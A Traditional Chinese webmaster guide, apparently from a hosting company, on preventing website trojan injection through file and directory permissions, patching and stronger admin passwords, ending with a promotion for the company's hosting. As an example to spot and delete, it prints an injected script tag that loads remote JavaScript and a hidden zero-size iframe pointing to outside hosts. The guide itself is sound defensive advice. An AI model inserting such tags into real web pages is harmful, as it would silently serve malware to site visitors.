防止網站因程式漏洞而被掛馬的簡易方法

仲介交易 HTTP://www.aliyun.com/zixun/aggregation/6858.html">SEO診斷 淘寶客 雲主機 技術大廳

相信大多站長都有網站被掛馬(被掛病毒)的經歷，特別是同中國互聯網一起發展的這批老資格站長，隨著網路普及的越深入，駭客技術越進步，就越暴露出以往程式的漏洞。 現在的新站長就幸福多了，目前流行的網站程式都已經成熟，比如shopex、動易、discuz，都是非常優秀的程式。 大家只要及時升級及時更新補丁就沒大問題了。 但是陸續還是有客戶來反映網站打開報病毒，我會對其耐心的講解原因以及告之處理方法，但發現大家還是缺乏一些網站維護常識。 在此，我給大家提供一些思路。

首先，打開網頁後殺毒軟體報警提示有病毒，最多的有2種可能，你的網頁被掛馬放入了病毒連結，一種是網站所在伺服器被arp病毒影響，相當於給這個機器掛了個馬，但這不表示伺服器被真實的入侵，可能是機房其它機器在發arp包。 那麼就把你訪問的該頁面比如index.asp提示有病毒的,通過ftp登錄,將這個檔下載到你本地電腦，右鍵該頁面用記事本打開，查看該頁面最下面，如果發現<script language=javascript src= HTTP://aaabbcc.net/awlove/fuckk/love.jsd></script><iframe src=HTTP://xxx.8888.com/newdm/ddd.htm width=0 height=0></iframe>等類似的語句，就表示你的網站已被入侵，這就是被掛的病毒代碼。 刪除後保存也就去掉了病毒連結，但是只能治根不治本。 入侵者還是可以給你繼續加入。 那麼該怎麼辦呢，什麼原因呢。

其實，目前雖然有了這麼多好的程式，但是還是存在2種情況，一種是現在依然使用的是幾年前的程式，要不是找網路公司製作的，要不是幾年前在網上下載的，這些程式大多都是漏洞百出，特別是注入漏洞，前幾年程式商寫代碼時完全沒有防範意識 ，但是網站又運行了這麼久，有大量重要資料，網站不能說更換就更換掉了，這種多半發生在企業做的企業網站上;另一種就是程式補丁更新不及長久不升級，駭客技術在不斷進步，新的漏洞也會不斷被發現， 所以如果程式服務商發佈補丁就要及時更新或者升級到最新的程式，反之更新不及時就可能被駭客利用並掛馬，但是難免會出現不能及時更新的時候，況且這樣很被動，漏洞的發現永遠是出現在補丁之前的。

那麼，現在我們用一種簡單的方式來解決這些煩人的病毒吧。 這裡我們就利用伺服器上的許可權機制來處理，伺服器許可權是網站程式安全的最後一道防線，也是最有效的，設置好了就一勞永逸。 設置思路就是把對外提供上傳的目錄執行許可權去掉，比如access資料庫所在目錄data以及uploadface、UploadFiles等上傳檔存放的目錄;把不需要上傳的目錄以及檔的寫入權限去掉，比如index.asp、 index.php等網頁檔以及admin、inc、include等不需要上傳檔的目錄。 這樣就算被上傳了木馬，不能被執行，就算有了控制許可權，但是沒有給網頁寫入病毒連結的代碼的許可權。 看似簡單的設置，其實奧妙無窮。 相關目錄和檔的用途在大家下載的套裝程式內會有說明的。 只要大家理解到許可權的魅力以及靈活掌握了設置方法，網站安全就變得簡單了。 在vps或者伺服器上建站也可運用同樣的道理，讓許可權為你的網站構築最堅實的防護網。

　　再建議大家注意幾個小常識，比如下載後的很多程式管理員密碼是預設的，就需要及時更改掉，密碼要儘量的長，10位數位和字母組合就可以，目前12位的純數位和8位的字母加密密碼已經被破解，這樣就算資料庫被下載， 也拿不到你的管理密碼;比如後臺管理密碼和ftp密碼不要記錄在自己電腦內，說不定那天你的電腦就有木馬了;如果有一定實力的站長，對自己的網站功能以及資料庫結構可以做一些調整，並對代碼做一些防注入的處理; 網站代碼儘量選擇網上流行的程式，比如做網店用shopex、ecshop，做論壇用discuz、phpwind，做綜合網站用動易，做論壇用wordpress、Oblog，做內容管理系統用dedecms、風訊等， 使用上品質高的程式就成功了一半了。 最後選擇一家專業的服務商，只有專業資歷高的服務商才能對伺服器安全有絕對的保障，然後註冊上功能變數名稱再買一個穩定高速的空間，這也就為建站做好基礎準備工作了。 華夏名網已把網站安全設置功能置入了主機管理系統內，相信可以為大家提供一個安全穩定的主機空間。